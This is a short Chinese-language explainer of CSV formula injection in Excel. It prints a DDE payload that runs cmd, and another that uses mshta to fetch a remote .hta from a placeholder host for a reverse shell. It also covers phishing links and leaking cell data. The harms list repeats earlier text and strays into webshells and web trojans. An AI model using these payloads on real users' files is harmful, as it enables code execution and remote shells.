攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击主要有以下几种:
1.OS命令执行攻击
通过在CSV文件中构建DDE公式,可以调用CMD达到执行操作系统命令的目的来控制服务器或进行攻击。
如下图所示,在单元格中输入1+cmd|’/C calc’!A0,回车后Excel会弹出一个框,提醒Excel需要启动另外一个程序(cmd),点击是,Windows会弹出计算器窗口。
利用Metasploit可以生成payload,可以使用下面的注入执行payload,从而达到反弹shell的目的。
=1+cmd|’/c mshta.exe http : //XXXXX : 8080/Micropoor.hta ‘!A0
因此,利用这种漏洞危害,我们可以在用户的操作系统上执行添加用户、开启任意程序、操作注册表、反弹shell等命令。
2.跳转至钓鱼网站
当用户点击下面链接时,会使用IE浏览器打开攻击者提供的钓鱼网站,起到钓鱼的目的,来进行诈骗等攻击。
3.信息泄露
通过在CSV文件中注入超链接函数,当用户打开文件并点击链接时,可以把指定的单元格内容提交到指定网址,攻击者会通过该函数获取用户的身份或个人信息。
CSV公式注入漏洞有以下危害:
OS命令执行攻击:通过在CSV文件中构建DDE公式,可以调用CMD达到执行操作系统命令的目的来控制服务器或进行攻击。
跳转至钓鱼网站:当用户点击下面链接时,会使用IE浏览器打开攻击者提供的钓鱼网站,起到钓鱼的目的,来进行诈骗等攻击。
信息泄露:通过在CSV文件中注入超链接函数,当用户打开文件并点击链接时,可以把指定的单元格内容提交到指定网址,攻击者会通过该函数获取用户的身份或个人信息。
恶意篡改网页内容:恶意篡改网页内容,登录后台后发布的内容,也可以发布对首页的更新,这时候更新可能就是一些非法信息,也可以对系统进行添加账户或者是数据库账号。这个需要拿到web shell 或者是更高的权限
网页挂木马:拿到webshell或者获取到服务器的权限以后,我们将一些网页木马挂在服务器上,去攻击别人。甚至在严重些我们可以控制整个web服务器,这个都是非常危险的。